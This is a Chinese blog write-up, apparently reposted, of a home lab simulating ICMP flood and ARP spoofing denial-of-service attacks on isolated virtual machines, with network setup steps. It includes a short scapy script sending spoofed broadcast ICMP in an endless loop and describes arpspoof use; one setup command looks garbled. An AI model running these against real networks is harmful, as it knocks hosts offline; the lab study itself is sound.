icmp dos和arp dos 攻击模拟实验

Posted qi-lin

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了icmp dos和arp dos 攻击模拟实验相关的知识,希望对你有一定的参考价值。

前言

准备

虚拟机准备

其实这些看各自情况,都可以,下面也涉及到了各系统的网络配置,大同小异(想起当时第一次参加比赛,连网络都不会配,真尴尬)
1选择一台虚拟机,再克隆出几台,这里选择red hat

2 vim /etc/sysconfig/network-scripts/ifcfg-eth0 打开文件删除hwaddr项和uuid
技术图片
echo ‘>/etc/udev/rules.d/70-persistent-net.rules‘ >>/etc/s‘ >>/etc/rc.local
然后重启
3克隆出虚拟机2 和5
技术图片
4其余虚拟机各自安装好

选择虚拟机

10.0.0.0网段:
kali 64位 10.0.0.9
windows xp 10.0.0.20
克隆2 10.0.0.10
10.0.0.1网段:
Kali 32位 10.0.1.8
克隆 5 10.0.1.10
虚拟路由器:
Red hat 10.0.0.12 10.0.1.12

网络拓扑

技术图片

准备网卡

1 打开虚拟适配器
技术图片
2 选择添加网络 vmnet2 选择仅主机模式 勾掉dhcp服务 将IP设置为自己想要的ip,因为我要两个网段,在这个设置为10.0.0.0。之后同样添加网络 vmnet3 ,与上相同,只是IP段置为10.0.1.0
技术图片
3 如图操作,选择网络适配器,选择自定义。Kali64、winxp、克隆2选择vmnet2。 Kali32、克隆5选择vmnet3 。
Red hat这个特殊,需要再添加一个网络适配器,第一个选择vmnet2 第二个选择vmnet3
技术图片

网络配置

1,克隆2 、克隆5、red hat这几台虚拟机配置都相同,只是设置静态ip不同,只要把 static ip这一项改为对应的即可 以5为例
sudo setup进入网络配置界面
技术图片
技术图片
技术图片
技术图片
另外对于red hat 按以上方式添加完eth0后,需新建eth1
技术图片
对于kali32和kali64 可以打开文件gedit /etc/network/interfaces 配置,将其中的address设置为自己的ip就可
技术图片
对于winxp,可以如下配置
技术图片
技术图片
2,配置完后需要重启网络服务
Linux为 service network restart
Kali为/etc/init.d/networking restart
技术图片
3,关闭防火墙
Linux为chkconfig iptables off(永久关)/etc/init.d/iptables stop(暂时关)
Klai 为ufw disable
技术图片
4,配置虚拟路由(red hat)
vim /etc/sysctl.conf改为1
技术图片
sysctl -p 修改生效
技术图片
5,建立网段的连接
在10.0.0.0网段为:route add -net 10.0.1.0 netmask 255.255.255.0 gw 10.0.0.12
在10.0.0.1网段为:route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.1.12

检测

克隆2ping 克隆5 成功 ,ttl值发现减一,说明经过一个路由
技术图片
克隆2ping kali64成功
技术图片
相互ping都能成功
从2追踪路径
技术图片
终于成功!!!!

实验部分

Icmp dos攻击

攻击机:kali64
被攻击:winxp
1运用python库scapy写一个不断发包脚本,源地址是被攻击主机的地址,目的地址是10.0.0.0网段下所有主机
from scapy.all import *
packet2=Ether(src=‘00:0c:29:78:B4:E9‘,dst=‘ff:ff:ff:ff:ff:ff‘)/IP(src=‘10.0.0.20‘,dst=‘10.0.0.0/24‘)/ICMP()
sendp(packet2,iface=‘eth0‘,loop=1)
2通过wireshark抓包可以发现,所有收到包的主机都会向被攻击主机发送回应包,因为实验环境中,只有这几台主机,其它地址都没有,所以有很多 no response found,并且攻击效果不明显
技术图片

Arp dos攻击

攻击机:kali64
被攻击:winxp
运用工具:arpspoof
1不断向被攻击机发送假的arp回应包,包中ip为网关10.0.0.12,对应mac地址却为自己的Mac地址
技术图片
技术图片
2之后发现被攻击机已经无法联网,ping不通网关
技术图片
3停止攻击后,恢复正常
技术图片

以上是关于icmp dos和arp dos 攻击模拟实验的主要内容,如果未能解决你的问题,请参考以下文章

确定安全威胁与漏洞-D

arp欺骗,或者攻击等等,应该用arp -啥的指令?实在是不清楚啊……DOS没学好,想弄也弄不出来。

如何使用dos命令delnet 攻击对方?

模拟解决DOS攻击的shell脚本

Linux编程之ICMP洪水攻击

什么是dos攻击?